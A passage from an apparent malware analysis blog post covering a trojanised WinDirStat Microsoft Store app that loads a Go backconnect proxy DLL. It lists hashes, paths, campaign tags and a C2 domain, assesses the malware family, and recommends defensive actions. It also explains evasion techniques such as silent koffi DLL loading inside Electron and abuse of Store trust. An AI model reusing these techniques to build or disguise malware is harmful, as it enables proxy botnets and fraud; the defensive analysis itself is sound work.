| Related SHA-256 | 453b6bb2f4e38ef477bdf9db13572d346f4341b44e0ed16f6c3fdbd0b1140739 | VirusTotal relationship pivot provided during campaign expansion |
| Related SHA-256 | b130bc1fadd1a8c819e5e98a2961767f4e885a473bcc6c8bc0f75464c5089c83 | WinDirStat-themed APPX/ZIP package from sandbox / VirusTotal pivot |
| YARA-related DLL SHA-256 | 27870854b9e85265e21d06a4b9e696093c1558c1480e36a42540943d66f7a3ec | Likely related backconnect DLL identified by custom YARA rule |
| YARA-related DLL SHA-256 | f61252203cc8b3ea93354c252e22b4ec8e5e1d6e7d3cac11bef64dfb7deddf3e | Likely related backconnect DLL identified by custom YARA rule |
| SHA-256 | 0efb10e5e2c77be36bbce5375a9e862c205b4837a951f0df62266370c75a26ed | app.asar (Electron loader) |
| File path | <execdir>\client.dll | RAT DLL, same directory as windirstat.exe |
| File path | <execdir>\resources\app.asar | Malicious Electron archive |
| Lock file | %TEMP%\windirstat-disk-analysis-review-done | Persistence marker / review-gate flag |
Registry IOCs
| Hive | Key / Value | Access Type |
|---|---|---|
| HKLM | SOFTWARE\Microsoft\Cryptography\MachineGuid | Read (victim fingerprinting) |
Behavioral IOCs
| Indicator | Value / Description |
|---|---|
| Campaign tag | microsoft_store_WinDirStat_Disk_Analysis_9MW9HR27K9B9 |
| Related campaign tag | microsoftstore_lightshot_9NTC2KMZMGND |
| Related package name | UAPSignedBinary_HobbyApps.Lightshot_1.0.4.0_x86__6b1d5ygjy0x60.msix |
| MS Store Product ID | 9MW9HR27K9B9 |
| Publisher name | PeakTools |
| DLL export | Start(uintptr_t, uintptr_t, str, int) |
| FFI loader | koffi (npm, v^2.15.1) used to load DLL from Node.js |
| Flag set name | "backconnect" (Go flag.FlagSet name) |
| Go source path | server/src/backconnect/ |
| Go source path | server/src/backconnect/startDirectConnectLoopWithRelays |
| Outbound beacon string | USERID:...\nBUILDVERSION:...\nHWID:...\n\n |
| Runtime process behavior | Three WinDirStat.exe instances remain after user-facing GUI closure |
11 Conclusion & Malware Family Assessment
Malware Family
client.dll is best assessed as a C2-controlled backconnect/proxy implant, consistent with residential proxy malware. This family is distinct from traditional RATs or ransomware in that its primary monetization model is proxy-as-a-service: infected machines are enrolled as exit nodes in a botnet of residential proxies, and the operator sells or uses access to route arbitrary network traffic through victim IP addresses.
Residential proxy botnets built from implants of this class are used downstream for:
- Ad fraud — clicking ads or faking impressions through residential IPs to evade detection
- Credential stuffing — distributing account brute-force attempts across thousands of residential IPs
- Web scraping — bypassing rate limits and geo-restrictions through victim IPs
- Carding / fraud — routing payment fraud through local residential IPs to appear legitimate
- Anonymization — obscuring the origin of attacks, espionage, or data theft operations
Threat Assessment
Family Similarity and Attribution Confidence
The sample should be described as a GhostSocks-like Golang backconnect/residential proxy implant, with
possible yamux-backed tunnel capability. This assessment is based on three layers of evidence: dynamic C2 registration and
heartbeat control, x32dbg-recovered protocol strings such as ping_interval and [UDP] yamux→target,
and Malcat's low-confidence but directionally consistent GhostSocks similarity result. Definitive family attribution remains
unconfirmed without additional infrastructure overlap or a triggered live relay session.
Technical Sophistication
The implant demonstrates a notably high level of operational maturity:
- Go language compilation produces a self-contained binary with no external runtime dependency, making deployment and persistence trivial.
- Cross-platform development (MinGW cross-compile from non-Windows) suggests an organized development pipeline.
- Dual C2 endpoints with round-robin fallback provide resilience against takedowns.
- Configurable flags (
-helper-urls,-user_id,-hwid) allow the same DLL binary to be reused across campaigns by different operators, with no recompilation. - Possible yamux multiplexing, based on static analysis, would allow many concurrent proxy streams over a single TLS connection if the relay stage is activated.
- Exponential backoff retry logic makes the implant resilient to C2 downtime without generating anomalous burst traffic.
- SOCKS5/proxy capability indicators suggest support for proxy-routed communications; live SOCKS/TOR activation was not observed.
- Silent FFI loading via
koffiinside an Electron app is an effective technique to bypass application-layer controls that do not inspect Electron app internals. - Legitimate UI camouflage: the WinDirStat front-end is fully functional, actively discouraging user suspicion.
- Microsoft Store distribution leverages the implicit trust users place in app store listings, bypassing SmartScreen and many endpoint controls.
Corroborating Tooling Evidence
Malcat Kesakode similarity scoring identified GhostSocks as the strongest, but still low-confidence, family match. This is not treated as conclusive attribution. It is incorporated as tertiary evidence because the GhostSocks description—Golang SOCKS/backconnect proxy malware—matches the sample's independently observed C2 behavior and static proxy/backconnect indicators.
Recommended Actions
| Priority | Action |
|---|---|
| Immediate | Block mylabubus.shop and all subdomains at DNS and network perimeter. Terminate any active connections to this domain. |
| Immediate | Isolate and re-image any hosts where this application was installed. Assume the machine's IP address has been used as a proxy exit node. |
| High | Search for client.dll (by hash or name), app.asar (by hash), and the lock file windirstat-disk-analysis-review-done in %TEMP% across the environment. |
| High | Hunt for outbound HTTPS connections to *.mylabubus.shop and outbound yamux/TLS sessions to unknown relay servers in network logs retroactively. |
| High | Report the Microsoft Store product ID 9MW9HR27K9B9 (publisher: PeakTools) to Microsoft for takedown. |
| Medium | Add EDR rules to detect koffi FFI DLL loading from Electron apps and flag Start() exports with backconnect-pattern argument strings. |
| Medium | Review policies around Microsoft Store application installation on managed endpoints. |
server/src/backconnect/ embedded in
the binary, the campaign tag structure, and the dual-endpoint C2 architecture are consistent with a
commercial or semi-commercial backconnect/proxy toolkit, though attribution to a specific toolkit or operator remains unconfirmed. The same binary may be reused by multiple
operators across different campaigns by varying only the -user_id and -helper-urls
arguments. Attribution to a specific threat actor would require further infrastructure analysis and
cross-referencing with known proxy-botnet operators.
Comments
Post a Comment